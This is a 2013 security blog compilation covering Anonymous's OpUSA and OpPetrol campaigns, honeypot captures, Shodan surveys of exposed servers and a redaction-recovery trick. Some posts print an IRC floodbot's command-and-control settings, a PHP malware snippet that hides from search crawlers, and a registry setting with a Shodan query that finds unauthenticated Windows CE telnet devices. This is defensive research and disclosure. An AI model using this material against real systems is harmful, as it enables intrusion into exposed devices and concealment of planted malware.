HPD Alerts was a pilot program (used) to provide breaking information to the public, Yu said. It was recently discontinued due to technical problems not associated with the cyberattack. So lets see - Anonymous and company planned to take down [7]Whitehouse.gov, FBI, and Bank of America. In fact, they even made this statement:
Anonymous will make sure that this May 7th will be a day to remember. On that day Anonymous will start phase one of operation USA. America you have committed multiple war crimes in Iraq, Afghanistan, Pakistan, and recently you have committed war crimes in your own country
155
BlogBook
3.5. May
So...youve got less than 24 hours for OpUSA to be a day to remember. So far its been an epic failure which will be forgotten by Friday. #TickTock
1. http://pastebin.com/zftTrrrh 2. http://pastebin.com/H9csfwA7 3. http://pastebin.com/UW3Pdqkn 4. http://pastebin.com/fUmPjPDt 5. http://www.pastebay.com/1205330 6. http://www.staradvertiser.com/news/breaking/20130506_HPD_alert_system_hacked_user_emails_and_passwords_ compromised.html 7. https://sites.google.com/site/caffsec/current-cyber-threats/opusa
3.5.6
OpUSA Updated Target List Posted (2013-05-07 00:33)
Ive managed to get a copy of the OpUSA target list. If youre at one of these organizations, be extra vigilant.
HIGH prole target list http://www.defense.gov/ http://pentagontours.osd.mil/ http://www.pentagonchannel.mil/ http://www.archives.gov/ http://www.whs.mil/ http://www.nsa.gov/ http://nsa.nato.int http://www.fbi.gov/ http://www.whitehouse.gov/ Additional targets are listed in the updated [1]Threat Watch brief.
1. https://sites.google.com/site/caffsec/current-cyber-threats/opusa
3.5.7
The NSAs Guide to Internet Research (2013-05-08 19:40)
[1] The NSA recently released on their [2]Declassication and Transparency page Untangling The Web - A Guide to Internet Research. This 642 page document contains search techniques and tips for everything from basic search fundamentals 156
3.5. May
BlogBook
to Google Hacking and even how to nd information on the Invisible internet. Now before you begin reading the document - be aware it is a bit outdated, as it was released in 2007. However, the document not only provides excellent insight into general advanced search techniques, but also serves as a glimpse of what kind of web research is performed by the NSA.
[3] Some of the best search advice Ive ever seen. One of the more interesting pieces of the document I found was the Google hacking section, most of which is still relevant today.
157
BlogBook
3.5. May
[4] Sensitive les can be very revealing.You can download the Untangling The Web directly [5]from the NSAs website.
1. http://4.bp.blogspot.com/-21YnGYDiME8/UYreCOc5UCI/AAAAAAAAAZQ/ESpa-8Ui2vk/s1600/UTW.jpg 2. http://www.nsa.gov/public_info/declass/index.shtml 3. http://3.bp.blogspot.com/-NKw3Tu4sEMY/UYrhsWHBFqI/AAAAAAAAAZs/9uGWOkR1mzE/s1600/rotr.jpg 4. http://2.bp.blogspot.com/-vXGNGJy_XIQ/UYrg8rAtNFI/AAAAAAAAAZg/Zq0LPafPK6k/s1600/undocumented-google.jpg 5. http://www.nsa.gov/public_info/_files/Untangling_the_Web.pdf
3.5.8
OpUSA Failure Shows Anonymous is Past Their Prime (2013-05-08 22:18)
There have been indications of this for quite a while now, but I think its time someone nally came out and said it. Anonymous is losing steam, and quickly dying. Thats right, Anonymous is quickly becoming an obsolete part of a forgotten era of the Internet. OpUSA promised to be a major cyber threat against the United States Government and major banks. Websites such as FBI.gov, Whitehouse.gov, and Bank of America were the key targets. The actual damage? (per [1]http://security.radware.com/Threats-Attacks/opusa/)
An alert system which was being decomissioned by the Honolulu Police Department 158
3.5. May A Blood Bank Embassy of Cape Verde in the US ...and a handful of low-trac websites which most people have never heard of.
BlogBook
So what happened? Simply put, most of the smart hackers in Anonymous have already been arrested, or have realized that prison orange does not look good on them. Compound with this the fact that members of Anonymous now know that their organization has been compromised by terrorist groups and law enforcement alike, many members of Anonymous are now most likely nished with the groups illegal activities. A quick look at number of news headlines about Anonymous Hacker shows the group has denitely gone past their prime, and may soon be going the way of the dodo, at least for their hacking activities. How much longer will Anonymous hacking groups last? Based upon current trends they may still be around for a while yet, but gone are the days where Anonymous should be considered a serious threat. Instead, after the failure of OpUSA, theyre now probably the laughing stock of the Internet. If youre interested, you can pick up a [2] #OpUSA #FAIL t-shirt from my CafePress shop.
1. http://security.radware.com/Threats-Attacks/opusa/ 2. http://www.cafepress.com/caffeinesecurity/10057209
3.5.9
Identifying
Hacker
Group
Locations
Based
Upon
Temporal
Signatures
(2013-05-09 19:15)
What day and time an event occurs can sometimes be very helpful in determining the origin of that event. Analysis Intelligence just posted an excellent article titled [1]Pattern of Life and Temporal Signatures of Hacker Organizations. This article explores the possibilities of using the day/time of hacking activity to determine not only what part of the world the activity originated from, but also if theyre a state sponsored group or not. I highly encourage you to check out the article, and if applicable, apply it to your own research.
1. http://analysisintelligence.com/cyber-defense/temporal-signatures-of-hacker-organizations/
3.5.10
Hacking to Setup a Free Counter Strike Server? (2013-05-10 16:05)
This week an attacker cracked my honeypots root password 123456 and tried to install software Ive never seen before. The le was quite large for most malware packages, at over 20 MB. Curiously I uploaded the le to VirusTotal and was quite surprised that it came back completely clean.
[1]VirusTotal Analysis of csservers redirecte linux hlds.zip After digging into the le further, I found that the le was actually a Counter Strike server? Sure enough, more digging the more I veried the hacker had compromised my honeypot with the sole purpose of running a Counter Strike server.
159
BlogBook
3.5. May
[2] I use the term hacker loosely because based upon the the attack, the person did not seem very knowledgeable outside of using his install scripts. You can read the full attack logs on [3]Google Drive. This is the rst time Ive ever seen someone compromise a system to install a game server. I know there was a day when IRC chat bots were all the rage that people would compromise servers just to install them, but theyre lightweight and dont generate a lot of trac. A gaming server is going to generate a lot of trac and CPU load, and surely would be noticed almost right away, right???
1. https://www.virustotal.com/en/file/de2e64a3b45dab4b8d85071c7b1bc7106aa0f20bf52332210caf43c33621c738/analysis/ 2. http://1.bp.blogspot.com/-7KbGt4m-8sU/UY1QulLPgZI/AAAAAAAAAaM/RCrmUB0uYk0/s1600/csserver.jpg 3. https://docs.google.com/document/d/1GeC50CA_6jwVRJ748VjWdaxZCWCaoAISSitqPzJYak4/edit?usp=sharing
3.5.11
IRC Floodbot Placed on My Honeypot (2013-05-11 01:09)
Someone dropped o an IRC Floodbot today on my honeypot. Its nothing spectacular or groundbreaking, and appears to have been around since at least 2009, maybe earlier. Ive replaced the binaries with VirusTotal analysis, and posted everything else as I received it. You can browse the shell scripts, as well the the malwares help le, at my [1]Google Code site. By the way, heres the cong info for the bots command and control center:
NICK USERFILE CMDCHAR LOGIN IRCNAME MODES 160
Hack 1 * eliata juno boot flood +ix-ws

3.5. May TOG CC 0 TOG CLOAK 1 TOG SPY 1 SET OPMODES 4 SET BANMODES 6 SET AAWAY 1 TOG NOIDLE 1 CHANNEL #m0atrea TOG PUB 1 TOG MASS 1 TOG SHIT 1 TOG PROT 1 TOG ENFM 1 SET ENFM +nt SET MDL 4 SET MKL 4 SET MBL 4 SET MPL 1 SERVER irc.deadly-co.ro 6667
BlogBook
I hope you enjoy examining the bot.

1. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/FlooderIRCBot/
3.5.12
@USNISTGOV CVE Alerts Now On @CaSec Twitter (2013-05-11 08:22)
Thanks to the folks at NIST for providing an RSS feed of new CVEs, I have incorporated CVEs into my automated [1] #exploitAlert feed on [2]Twitter. In addition to CVE content, the #exploitAlert feed provides information on new vulnerabilities/exploits found on PasteBin and similar sites. If youre interested in how the CVE feed works, I have made the feed available on my [3]IFTT prole.
1. https://twitter.com/search/realtime?q=%23exploitAlert&src=typd 2. https://twitter.com/CaffSec 3. https://ifttt.com/people/caffsec
3.5.13
How Not to Redact a Document, Part 2 (2013-05-11 09:29)
Last year I made a post about How Not To Redact a Document, in which I showed some digitally redacted documents can have have the redaction removed by [1]simply highlighting the redacted text. Unfortunately, digitally redacted documents arent the only ones susceptible to attack. Recently the IRS has come under re for sending to Tea Party groups probing letters threatening their non-prot status unless they [2]answer a large number of questions. Fox News redacted parts of the letter, as you can see below.
161
BlogBook
3.5. May
[3]
However, Fox News really failed at their redaction process, and left a lot of sensitive information exposed. I personally use a photo editor called Zoner Photo Studio, but the same technique can be used in Photoshop. First, lets play with the image levels a little bit...
[4]
Move some sliders around, and text begins to magically appear! 162
3.5. May
BlogBook
[5] Now lets adjust the contrast and brightness a little.
[6] After performing the manipulations above, I doubled the size of the image for easier examination.
[7]
Click to View Full SizeYou can pretty 163
BlogBook
3.5. May
clearly make out some of the details, including mailing address and phone numbers. Of course this [8]information is already [9]available online anyways, so Im not sure why it was redacted. However, this could be a very interesting technique to use against [10]Freedom of Information Act documents with redacted sections. Once again, related reading: [11]A Primer On Electronic Document Security. Maybe someone will pay attention this time.
1. http://caffeinesecurity.blogspot.com/2012/09/how-not-to-redact-document.html 2. http://www.foxnews.com/politics/interactive/2013/05/10/letter-from-irs-to-waco-tea-party/ 3. http://3.bp.blogspot.com/-Epes2AY5qVI/UY5DaGbuw_I/AAAAAAAAAac/gb-K7D-cyAk/s1600/redact-1.png 4. http://1.bp.blogspot.com/-ko4CJRP09ZE/UY5FhYXqMWI/AAAAAAAAAao/BAleN4EpCtA/s1600/redact-2.png 5. http://3.bp.blogspot.com/-2BKRArgPyek/UY5Fpz03IxI/AAAAAAAAAaw/9hcRH-am8lk/s1600/redact-3.png 6. http://1.bp.blogspot.com/-cyCLyb2f4io/UY5F-455kKI/AAAAAAAAAa4/yi2ioOXIAB8/s1600/redact-4.png 7. http://3.bp.blogspot.com/-M-7kibgSjEU/UY5GNllU-vI/AAAAAAAAAbA/09ekqdZhYic/s1600/redact-5.png 8. http://www.irs.gov/Charities-&-Non-Profits/How-to-Contact-the-Tax-Exempt-and-Government-Entities-Division 9. https://www.wacoteaparty.org/Contact_Us.html 10. http://www.foia.gov/ 11. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa2459/?p=w_aaaa2459
3.5.14
New Honeypot Online! (2013-05-11 18:10)
I just got my second honeypot up an running - [1]Glastopf! This honeypot will allow me to capture HTTP based attacks, as well as the SSH attacks Im already capturing with Kippo. If I get any interesting hits Ill be sure to post!
1. http://glastopf.org/
3.5.15
People People People People People People
Facebook Graph Search and Anonymous (2013-05-12 20:58)

who who who who who who like like like like like like Anonymous Anonymous Anonymous Anonymous Anonymous Anonymous and and and and and and Izz ad-Din al-Qassam Brigades (Hamas): 53 work at U.S. Federal Government (Includes FBI and CIA): 50 attended Yale University: 106 attended Harvard University: 828 attended University of Maryland: 26 are Lawyers: 329
3.5.16
Possibly Malicious Tor Exit Node Found in the Wild (2013-05-17 14:37)
Today I started doing some research on Tor, looking at the dierent exit nodes and who hosts them. While the diversity of hosts is interesting and worthy of a future blog post, what I stumbled on was quite disturbing. I have identied a possibly malicious Tor exit node.
3.5.17
Tor and Censorship (2013-05-17 19:22)
[1]https://check.torproject.org/cgi-bin/TorBulkExitList.py 164
3.5. May
1. https://check.torproject.org/cgi-bin/TorBulkExitList.py
BlogBook
3.5.18
OpPetrol - Its Not About the Oil (2013-05-19 14:32)
Ive posted a new Threat Watch bulletin for OpPetrol - a multi-target operation being run by Anonymous. Updates to the bulletin can be read [1]here. Below is the bulletin posted in its entirety. INTEL BRIEF First Release: 19MAY2013 Updated: 19MAY2013 Subject: Anonymous OpPetrol Target: United States, Canada, United Kingdom, Israel, Saudi Arabia (only Government), China, Italy, France, Germany, Kuwait (only government) and Qatar (only government) Specic named targets: Saudi Arabia government emails (Most likely Phishing - [2]http://pastebin.com/0Yr6kyWA) Additional high probability targets: Pending Date: June 20, 2013 Attackers: AnonGhost Others Pending Attack types: Distributed Denial of Service Attacks (DDoS) Website Defacement Possible leak of sensitive information Details: Original announcement on Pastebin: [3]http://pastebin.com/Xsewfqvr Second announcement on Pastebin: [4]http://pastebin.com/38kvvD1S Quote: As petrol is sold with the dollar currency of the U S we nd this not acceptable when the oil should be sold at the country of Origin, making petrol a lot less then what you the citizens is paying for it. Additional Analysis: A look at the target list vs. top oil producers of the world (data from [5]CIA World Factbook) Rank Target List Top Oil Producers Amount Produced (BBL/Day) 1 No Russia 10,370,000 2 Yes Saudi Arabia 10,000,000 3 Yes United States 9,023,000 4 No Iran 4,231,000 5 Yes China 4,150,000 6 Yes Can ada 3,592,000 7 No United Arab Emirates 3,087,000 8 No Mexico 2,934,000 9 No Iraq 2,900,000 10 Yes Kuwait 2,682,000 11 No Brazil 2,633,000 12 No Nigeria 2,525,000 13 No Venezuela 2,470,000 14 No Norway 1,998,000 15 No Algeria 1,885,0 00 16 No Angolia 1,840,000 17 No Kazakhstan 1,635,000 18 Yes Qatar 1,631,000 19 Yes United Kingdom 1,099,000 ... ... ... 43 Yes Germany 165,300 50 Yes Italy 99 ,200 60 Yes France 49,530 101 Yes Israel 100 102 No Jordan 20 103 No Slovenia (Last Place) 5
165
BlogBook
3.5. May
Based upon the above target list, this attack has nothing to do with oil exports, especially since Israel only produces 100 BBL/Day and is third from the bottom. Also of interesting note, the announcement speaks about Syria stealing your retirement and savings, but it was [6]Cyprus, not Syria, that raided savings accounts when the country went bankrupt. This operation appears to simply be an attempt at OpUSA and OpIsrael again, with a few extra countries thrown into the mix so that the operation can be declared a success even if only of the target countries is compromised. This operation is simply a publicity stunt, and not by any means a meaningful attempt to change anything. Recommendations: Standard recommendations apply Note: Based upon the past failures of OpIsrael and OpUSA, do not expect a large turnout for this operation either. Prior to June 20 - In order for multiple sites to be defaced at the same time, malware infection or compromise of credentials must occur ahead of time. Change passwords, and perform full antivirus scans of systems. Monitor rewall logs for suspicious activity involving external IP addresses. Be vigilant, and warn employees of highly targeted phishing attacks. On June 20 - Monitor network trac, and coordinate with ISP should any signs of DDoS be seen. After June 20 - Look for signs of compromise after DDoS attack. A common technique now being employed by multiple organizations is to mask hacking attacks with DDoS attacks. Recorded Future Analysis: [7]https://www.recordedfuture.com /live/sc/1L4n2d6OXDi8
1. https://sites.google.com/site/caffsec/current-cyber-threats/oppetrol---june-20 2. http://pastebin.com/0Yr6kyWA 3. http://pastebin.com/Xsewfqvr 4. http://pastebin.com/38kvvD1S 5. https://www.cia.gov/library/publications/the-world-factbook/rankorder/2241rank.html 6. http://www.newsmax.com/Rahn/Government-Savings-Cyprus-banks/2013/03/27/id/496552 7. https://www.recordedfuture.com/live/sc/1L4n2d6OXDi8
3.5.19
FREE
CLASS!!!
Malicious
Software
and
its
Underground
Economy
(2013-05-19 23:41)
Starting June 13 I will be taking the free Coursera course [1]Malicious Software and its Underground Economy. The course will explore the world of malicious software, and look at how its used to generate millions of dollars per year. If you have some programming experience, as well as security experience, Id like to encourage you to sign up!
1. https://www.coursera.org/course/malsoftware
3.5.20
An
Open
Letter
to
@ChaCha
Regarding
Copyright
Infringement
(2013-05-20 03:00)
UPDATE: ChaCha was [1]VERY helpful with this, and resolved the issue right away! Stay classy ChaCha! This evening I stumbled on something a little disturbing. ChaCha has answered the question [2]How do I save a picture from SnapChat on a droid? word-for-word with text from [3]my own blog post on the subject. As such, I have submitted the following letter to ChaCha. 166
3.5. May Hello,
BlogBook
I happened across the answer to How do I save a picture from Snapchat on a Droid? tonight, and Im a little upset. The answer is directly copied from a post on my blog caeinesecurity.blogspot.com.
In accordance with Fair Use, I would like to request that should you wish to continue to include this content word-for-word from my blog, that you also include a link to the source blog post http://caeinesecurity.blogspot.com/2012/12/snapchat-covert-scre en-capture-for.html. I feel this would be a win-win for both of us, and we wont need to worry about getting your legal department involved.
I eagerly await your response within 10 business days.
Thanks,
Ken Caeine Security
[4]
167
BlogBook
3.5. May
[5]
1. http://caffeinesecurity.blogspot.com/2013/05/chacha-you-guys-rock-thanks-for-help.html 2. http://www.chacha.com/question/how-do-i-save-a-picture-from-snapchat-on-a-droid 3. http://caffeinesecurity.blogspot.com/2012/12/snapchat-covert-screen-capture-for.html 4. http://1.bp.blogspot.com/-QZdcZ4i7uSg/UZnJN3Z7yLI/AAAAAAAAAb4/26obuSxu0OQ/s1600/chacha.png 5. http://2.bp.blogspot.com/-wUojMkDQQwk/UZnJSxg46UI/AAAAAAAAAcA/IwLg0-uhafs/s1600/caffsecblogsnapchat.png
3.5.21
Tech Support SCAM! The MUST SEE Video about iYogi! (2013-05-21 00:15)
Having personally seen the fear mongering iYogi used against a family member to get you to pay for their services (and having to clean up her computer after their software was installed), this video does not shock me in the least. Share this video with all your friends and family and warn them about the scam which is iYogi tech support. [EMBED]
3.5.22
@ChaCha You Guys Rock, Thanks for the Help! (2013-05-21 00:35)
You might have read my [1]open letter to ChaCha regarding copyright infringement and fair use of my [2]SnapChat blog post. Im happy to say that ChaCha was very polite, and corrected the issue immediately along with an [3]apology! I didnt have to jump through any legal hoops or anything. I politely asked, and they reacted right away. This is how human resources and customer service should be done folks. Stay Classy [4]ChaCha!
1. http://caffeinesecurity.blogspot.com/2013/05/an-open-letter-to-chacha-regarding.html 2. http://caffeinesecurity.blogspot.com/2012/12/snapchat-covert-screen-capture-for.html 3. https://twitter.com/ChaCha/status/336495661463773184 4. http://www.chacha.com/
168
3.5. May
BlogBook
3.5.23
FREE eBook: Intrusion Detection Systems with Snort: Advanced IDS Techniques (2013-05-22 19:17)
Receive Your Complimentary eBook NOW!
[1] Intrusion Detection Systems with Snort: Advanced IDS Techniques Using Snort, Apache, MySQL, PHP, and ACID Protect your network with Snort: the high-performance, open source IDS. Snort gives network administrators an open source intrusion detection system that outperforms proprietary alternatives. Now, Rafeeq Ur Rehman explains and simplies every aspect of deploying and managing Snort in your network. Youll discover how to monitor all your network trac in real time; update Snort to reect new security threats; automate and analyze Snort alerts; and more. Best of all, Rehmans custom scripts integrate Snort with Apache, MySQL, PHP, and ACID - so you can build and optimize a complete IDS solution more quickly than ever before.
An expert introduction to intrusion detection and the role of Snort Writing and updating Snort rules to reect the latest attacks and exploits Contains detailed coverage of Snort plug-ins, preprocessors, and output modules Logging alerts to a MySQL database Using ACID to search, process, and analyze security alerts Using SnortSnarf to analyze Snort log les XML support for Snort via the Simple Network Markup Language (SNML) [2]Request your free copy today!
1. http://img.tradepub.com/free/w_infk17/images/w_infk17c4.gif 2. http://caffinesecurity-blogspot.tradepub.com/free/w_infk17/prgm.cgi
169
BlogBook
3.6. June
3.6
June
3.6.1
Using Shodan to Measure The Security of the Internet (2013-06-01 02:01)
[1]Shodan is a search engine for potentially vulnerable computer systems, based upon header information. It allows you to perform a lot of neat tricks, such as see what your organizations public footprint looks like, as well as your competitors. You can use it to nd interesting devices such as routers, webcams, printers, etc. I performed the following searches to see just how many glaringly obvious vulnerable systems are exposed to the internet. First search: IIS/5.0. This search will produce systems which are running Windows 2000 with an IIS web server. Of course Windows 2000 and IIS 5.0 are no longer supported by Microsoft, and multiple vulnerabilities are publicly known. So needless to say, I was quite disturbed when I found half a million exposed IIS/5.0 webservers.
[2] IIS 5.0 on Windows 2000Surely no one would be running a version of Windows older than Win 2000, and connect it to the Internet, right?
I decided to try my luck and search for even older versions of IIS. And while the numbers werent as severe as the IIS/5.0 numbers, the number of extremely vulnerable web servers out there is shocking. 170
3.6. June
BlogBook
[3]
IIS
4.0 on Windows NT 4.0[4]
IIS 3.0 on Windows NT 4.0
171
BlogBook
3.6. June
SP2+[5] IIS 2.0 on Windows NT 4.0 with Service Pack less than 2.0Surely no one would be running a server with less than NT 4.0? Well, maybe they are. In fact, theres almost 1,000 of them...
[6] IIS 1.0 on Windows NT 3.51, Unsupported as of December 2001If you look at the rst entry on the list, youll see that Im not the rst person to look for IIS 1.0 instances with Shodan. Someone actually hacked the rst system on the list, and altered its HTTP header information to inform you the system was already compromised. Every one of these systems is a potential botnet drone just waiting for infection, if they havent been compromised already. If youre not concerned, you should be. These servers are your neighbors on the Internet. Once they are compromised, they can be used to attack your organization. According to Netcraft, in May 2013 there were over 672 million web sites on the Internet. So while the number of unsupported Microsoft web servers is less than 1 % of the Internet, these are still alarming numbers. If these results are any indication of just how vulnerable the internet is, weve got a long way to go to properly secure it. 172
3.6. June
1. http://www.shodanhq.com/ 2. http://4.bp.blogspot.com/-cMwN4VtkDh8/UamD2Mqp_7I/AAAAAAAAAcc/HdZz6IK2aXs/s1600/iis5.png 3. http://3.bp.blogspot.com/-r463oa8ZnXU/UamFlE8eE4I/AAAAAAAAAcs/BaZCY3oCINI/s1600/iis4.png 4. http://3.bp.blogspot.com/-5sKV-OGdqHE/UamGLEKaVNI/AAAAAAAAAc0/q2BbiknWRdo/s1600/iis3.png 5. http://3.bp.blogspot.com/-276gvJQDq_o/UamGxm5sGqI/AAAAAAAAAc8/O1dGsQEKhzo/s1600/iis2.png 6. http://2.bp.blogspot.com/-6OoMra8mw9I/UamIP8-ASiI/AAAAAAAAAdI/xkRjltVxmok/s1600/iis1.png
BlogBook
3.6.2
Unauthenticated
(2013-06-01 02:31)
Windows
CE
Telnet
Service
Vulnerable
Conguration
Since this is a Windows CE conguration issue, and not a software vulnerability, I am releasing this information publicly so that software developers can be aware of the issue. Tonight I stumbled on a quite scary Shodan search which Id like to share with everyone. [1]Windows CE Telnet Service What is the Windows CE Telnet Service? Apparently Windows CE has a built in telnet service for debugging of applications, as outlined in [2]this MSDN blog post. Now the truly scary part about all this is that the telnet server has the ability to disable authentication requirements. [HKEY LOCAL MACHINE\COMM\TELNETD] UseAuthentication=dword:0 IsEnabled=dword:1 When you do disable the authentication requirements (for debugging purposes only of course), youre greeted with an administrator level command prompt as soon as you connect with telnet. From there you can perform all sorts of fun things, like restart the device or access any locally stored le pretty much any command which is typically available at a Windows command line. Despite the fact that this was only intended for debugging purposes, Shodan found 892 public facing systems with this vulnerability. Who knows how many thousands more reside behind corporate rewalls, with organizations completely unaware that their devices with embedded Windows are vulnerable to attack.
[3]
Vulnerable Windows CE Telnet ServicesClearly, some 173
BlogBook
3.6. June
embedded Windows developers have accidentally left this setting enabled prior to shipping their devices. One thing which really stands out is that some of the vulnerable systems are KVMs, meaning that should the KVM be compromised, the attacker will have control of all connected systems, and be able to install a keylogger to capture all usernames/passwords. Since KVMs do not typically have Antivirus installed, this activity may never be noticed. As I dive deeper into Shodan, I hope to bring more interesting vulnerabilities like this one to light. Stay tuned!
1. http://www.shodanhq.com/search?q=%22Windows+CE+Telnet%22+%22Pocket+CMD%22 2. http://blogs.msdn.com/b/cenet/archive/2004/09/30/the-ce-telnet-server.aspx 3. http://3.bp.blogspot.com/-ZwyNvLlKFuQ/UamSlyff-cI/AAAAAAAAAdU/v7z4Ib-KKXY/s1600/wincetelnet.png
3.6.3
New PHP Malware Source Available for Analysis (2013-06-09 00:17)
After about a month of running my Glastopf honeypot, Ive started getting some hits. You can take a look at the les Ive collected (including deobfuscated code) over at my [1]malware analysis site. One thing which stands out me in some of the malware is that it intentionally hides from being cached by search engines using the following code:
if(!empty( $ SERVER[HTTP USER AGENT])) { $userAgents = array(Google, Slurp, MSNBot, ia archiver, Yandex, Rambler); if(preg match(/ . implode(|, $userAgents) . /i, $ SERVER[HTTP USER AGENT])) { header(HTTP/1.0 404 Not Found); exit; } }
See something else worth discussing? Post it here!

1. https://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/www-honeypot/
3.6.4
Come Join Me On @ThreatConnect and Share Cyber Threat Intelligence

(2013-06-13 19:46)
[1]ThreatConnect is a new site providing the ability to share intelligence on Advanced Persistent Threats and other hacking incidents/perpetrators. I have recently setup an account on the site, and have started adding incidents from my honeypot. ThreatConnect allows recording and sharing of threat indicators and incidents, including hosts, le hashes, malicious email addresses, and more! 174
3.6. June
BlogBook
[2] Are you interested in exchanging data? If so, please sign up for an account with ThreatConnect, then send me a connection invite. The email address youll need to send the invite is in the screenshot below.
[3]
1. https://threatconnect.com/ 2. http://1.bp.blogspot.com/-6-S5nyiICys/UbpZSDx_L1I/AAAAAAAAAd0/7Gv5HcvEN78/s1600/indicators.png 3. http://1.bp.blogspot.com/-R-zEVtjjk-Y/UbpY6k5uA1I/AAAAAAAAAds/HBC0bJoOxPc/s1600/connectinvite.png
3.6.5
Anonymous #OpPetrol Most Epic #Fail Yet - Full Analysis Of Results

(2013-06-21 10:47)
Looking at the damage (and I use that term very loosely) done as part of OpPetrol, Anonymous support by actual hackers is fading fast. Lets take a look at the original [1]target list of what was supposed to be attacked.
United States, Canada, United Kingdom, Israel, Saudi Arabia (only Government), China, Italy, France, Germany, Kuwait (only government) and Qatar (only government) Hackers News Bulletin released a live list of all the damage done as part of OpPetrol, and its [2]a rather short list. Lets run through the list and look to see if Anonymous actually succeeded in their operation. Better grab some popcorn, this is going to be quite entertaining.
175
BlogBook [3]
3.6. June
First (and probably most notable) on the list is a Saudi Arabia government website: http://www.allaithged.gov.sa/doc/images/announce/ This appears to be a local government website in southwest Saudi Arabia. However, the main landing page itself was not defaced, but instead a hidden webpage was placed, most likely days in advance. Trend Micro has a great writeup on how these timed attacks [4]really arent timed at all. Anonymous essentially cheated with their attack on the Saudi government.
[5] Next on the list is multiple Indonesia government websites. However, Indonesia wasnt on the original target list. The sites were probably attacked last minute in an eort to try to declare success.
[6] Then there are 142 random websites which most people have never heard of. These range from a hotel in United Arab Emirates (country not on target list) to several home improvement websites in Denver, Colorado. In fact, the only oil related website I see on the list is RTLubricants.com, a Pakistan (country not on target list) automotive lubricant manufacturer.
[7] Peoplesbankruptcy.com was indicated as a special hack, whatever that means.
[8] A pastebin ([9]http://pastebin.com/L9YPvFn5) was released with a list of email addresses and names associated with Aramco Oil Company. But Google searches show most of this information is available publicly, and was most likely obtained using Maltego. Also, examining the list further, Aramco sure does have a lot of people working for them born on January 1.
[10] A pastebin ([11]http://pastebin.com/qP00xctu) was released with usernames and passwords of Total oil company employees. This may actually be the only legitimate attack as part of OpPetrol, but was most likely done long before June 20. UPDATE: I have been informed by an anonymous source that this data is fake, and that only two of the people on the list actually work for Total oil company. No real passwords are on the list.
[12] Several posts on Facebook are mentioned, but these posts no longer exist, and can not be veried in authenticity.
[13] Random email addresses of Saudi Arabia and Germany ([14]https://privatepaste.com/d4db09dd6e) were dumped from a database somewhere, but no password info is included, and all the email addresses are free 176
3.6. June accounts such as Yahoo, Gmail, or Hotmail.
BlogBook
[15] A possible cross site scripting exploit was released against Pennzoil.com, which really seems trivial since it wasnt exploited to actually deface the site, or leak any information.
[16] And nally, Tunisian Hckers Team and XhckerTN claimed to hack USA Citizen Full Information. This hack is such an fail that it deserves its own EPIC FAIL icon. First pastebin ([17]http://pastebin.com/Cq0S95UN) no longer exists. It might have actually contained some real personal information. The second pastebin ([18]http://pastebin.com/EVZjKnjB) contains a list of random IP addresses.
[19] The third pastebin ([20]http://pastebin.com/c75gC2ia) contains even more nonsensical data - a list of user-agents (web browser versions), more IP addresses, and the reverse DNS entries for those IP addresses. This pastebin is extremely impressive in that Anonymous has nally gure out how to read a web server log. In conclusion, the above incompetency shows just how few technical minded members of Anonymous remain. Most of whats left are script kiddies who dont even understand how the Internet works, and think that posting IP addresses and browser versions is equivalent to having dox on everyone in the USA. #OpFail
1. https://sites.google.com/site/caffsec/previous-threat-assessments/oppetrol---june-20 2. http://hackersnewsbulletin.com/2013/06/1911.html 3. http://2.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeI/nxRrG1oQgAk/s1600/Fail.png 4. http://blog.trendmicro.com/trendlabs-security-intelligence/failed-opusa-attacks-show-how-hackers-operate/ 5. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png 6. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png 7. http://3.bp.blogspot.com/-pxibfb4g_tw/UcRiUCsFqVI/AAAAAAAAAeQ/_Th2mii3jMo/s1600/WTF.png
177
BlogBook
8. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png 9. http://pastebin.com/L9YPvFn5 10. http://2.bp.blogspot.com/-os-z3MqWmtE/UcRw9NXMQUI/AAAAAAAAAfM/WGzngkEY4Kw/s1600/Fail.png 11. http://pastebin.com/qP00xctu 12. http://4.bp.blogspot.com/-pxibfb4g_tw/UcRiUCsFqVI/AAAAAAAAAeU/IGNce_k7Icw/s1600/WTF.png 13. http://3.bp.blogspot.com/-sAmJxBWBuY0/UcRiNdXCQ0I/AAAAAAAAAeM/DQe1p0adXr4/s1600/Fail.png 14. https://privatepaste.com/d4db09dd6e 15. http://4.bp.blogspot.com/-pxibfb4g_tw/UcRiUCsFqVI/AAAAAAAAAeU/IGNce_k7Icw/s1600/WTF.png 16. http://4.bp.blogspot.com/-SX3onvFU9IM/UcRjaUOpAyI/AAAAAAAAAeg/xu2t-0v86qw/s1600/EpicFail.png 17. http://pastebin.com/Cq0S95UN 18. http://pastebin.com/EVZjKnjB 19. http://1.bp.blogspot.com/-mTBDkYEp2js/UcRlFdhC7tI/AAAAAAAAAe0/vLpzwM9vFpk/s1600/ipaddresses.png 20. http://pastebin.com/c75gC2ia
3.6. June
3.6.6
Coming Changes and Improvements to Caeine Security Blog (2013-06-25 17:00)
Over the past year Ive gathered a lot of logs and malware information from my honeypot. The biggest challenge has always been - what to do with the information once I gather it. Ive recently started sharing the more signicant events through ThreatConnect, but really feel some of this data should be shared with a wider audience. Im thinking of implementing a couple things:
Tracking of threat indicators through my Malware Analysis Google Code sites Wiki Tracking of threat attack patterns through Google Calendar ...? Something else Im considering is building a Linux Rescue Disk for analysis and remediation of malware infected Windows systems. All included software would be 100 % open source. Not only would I build this for my own use, but Id also make an ISO available free of charge. I know there are distros out there already aimed at doing this, but Im really considering making my own Caeine Security branded distro. Do you have any recommendations on additional methods of using the data Ive collected? Or recommendations for my Linux rescue disk? If so Id love to hear from you. You can comment below or email me CaSecBlog <at> Gmail <dot> com
3.6.7
Recorded
Future
Announces
Cyber
Threat
Intelligence
Application
(2013-06-28 20:42)
